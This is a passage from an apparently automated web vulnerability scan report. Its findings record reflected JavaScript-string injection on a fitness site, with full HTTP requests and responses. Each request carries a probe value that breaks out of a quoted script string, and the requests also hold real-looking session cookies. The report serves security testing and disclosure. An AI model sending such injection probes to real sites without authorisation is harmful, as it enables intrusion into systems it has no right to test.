Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:07 +0000
ETag: "1297606687-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:08 GMT
Date: Sun, 13 Feb 2011 14:18:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all7781d';a9f35523aa7?destination=node%2Fall7781d';a9f35523aa7&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.36. http://fitbie.msn.com/sites/all/modules/fbconnect/fbconnect.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/fbconnect/fbconnect.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52335'%3b81d81a358d7 was submitted in the REST URL parameter 2. This input was echoed as 52335';81d81a358d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all52335'%3b81d81a358d7/modules/fbconnect/fbconnect.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:13 GMT
Date: Sun, 13 Feb 2011 14:18:13 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all52335';81d81a358d7?destination=node%2Fall52335';81d81a358d7&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.37. http://fitbie.msn.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60dc5'%3ba8f47750afe was submitted in the REST URL parameter 2. This input was echoed as 60dc5';a8f47750afe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all60dc5'%3ba8f47750afe/modules/filefield/filefield.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:06 +0000
ETag: "1297606686-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:06 GMT
Date: Sun, 13 Feb 2011 14:18:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all60dc5';a8f47750afe?destination=node%2Fall60dc5';a8f47750afe&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.38. http://fitbie.msn.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 996e5'%3b67a6405b09d was submitted in the REST URL parameter 2. This input was echoed as 996e5';67a6405b09d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all996e5'%3b67a6405b09d/modules/jquery_update/replace/jquery.min.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:08 +0000
ETag: "1297606688-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:09 GMT
Date: Sun, 13 Feb 2011 14:18:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all996e5';67a6405b09d?destination=node%2Fall996e5';67a6405b09d&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.39. http://fitbie.msn.com/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7db3d'%3b91672d1362 was submitted in the REST URL parameter 2. This input was echoed as 7db3d';91672d1362 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all7db3d'%3b91672d1362/modules/logintoboggan/logintoboggan.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:05 +0000
ETag: "1297606685-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:06 GMT
Date: Sun, 13 Feb 2011 14:18:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all7db3d';91672d1362?destination=node%2Fall7db3d';91672d1362&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.40. http://fitbie.msn.com/sites/all/modules/panels/css/panels.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/panels/css/panels.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2a39'%3b51b4fdaaf75 was submitted in the REST URL parameter 2. This input was echoed as a2a39';51b4fdaaf75 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/alla2a39'%3b51b4fdaaf75/modules/panels/css/panels.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/alla2a39';51b4fdaaf75?destination=node%2Falla2a39';51b4fdaaf75&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.41. http://fitbie.msn.com/sites/all/modules/panels/js/panels.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/panels/js/panels.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a5ab'%3b98304e784b4 was submitted in the REST URL parameter 2. This input was echoed as 8a5ab';98304e784b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all8a5ab'%3b98304e784b4/modules/panels/js/panels.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:09 +0000
ETag: "1297606689-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all8a5ab';98304e784b4?destination=node%2Fall8a5ab';98304e784b4&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.42. http://fitbie.msn.com/sites/all/modules/quicktabs/css/quicktabs.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/quicktabs/css/quicktabs.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ddd9'%3bf3ac3f7c6d4 was submitted in the REST URL parameter 2. This input was echoed as 3ddd9';f3ac3f7c6d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all3ddd9'%3bf3ac3f7c6d4/modules/quicktabs/css/quicktabs.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:08 +0000
ETag: "1297606688-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:09 GMT
Date: Sun, 13 Feb 2011 14:18:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all3ddd9';f3ac3f7c6d4?destination=node%2Fall3ddd9';f3ac3f7c6d4&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.43. http://fitbie.msn.com/sites/all/modules/quicktabs/js/quicktabs.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/quicktabs/js/quicktabs.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff054'%3b81e7412e45 was submitted in the REST URL parameter 2. This input was echoed as ff054';81e7412e45 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/allff054'%3b81e7412e45/modules/quicktabs/js/quicktabs.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:07 +0000
ETag: "1297606687-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:08 GMT
Date: Sun, 13 Feb 2011 14:18:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allff054';81e7412e45?destination=node%2Fallff054';81e7412e45&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.44. http://fitbie.msn.com/sites/all/modules/rodale/comments_ajax/comments_ajax.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/rodale/comments_ajax/comments_ajax.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6b66'%3b243f7e5f1cd was submitted in the REST URL parameter 2. This input was echoed as f6b66';243f7e5f1cd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/allf6b66'%3b243f7e5f1cd/modules/rodale/comments_ajax/comments_ajax.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:15 +0000
ETag: "1297606695-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:16 GMT
Date: Sun, 13 Feb 2011 14:18:16 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allf6b66';243f7e5f1cd?destination=node%2Fallf6b66';243f7e5f1cd&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.45. http://fitbie.msn.com/sites/all/modules/rodale/fit_tools/css/fit_tools.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/rodale/fit_tools/css/fit_tools.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad207'%3bdc09f024ad was submitted in the REST URL parameter 2. This input was echoed as ad207';dc09f024ad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/allad207'%3bdc09f024ad/modules/rodale/fit_tools/css/fit_tools.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
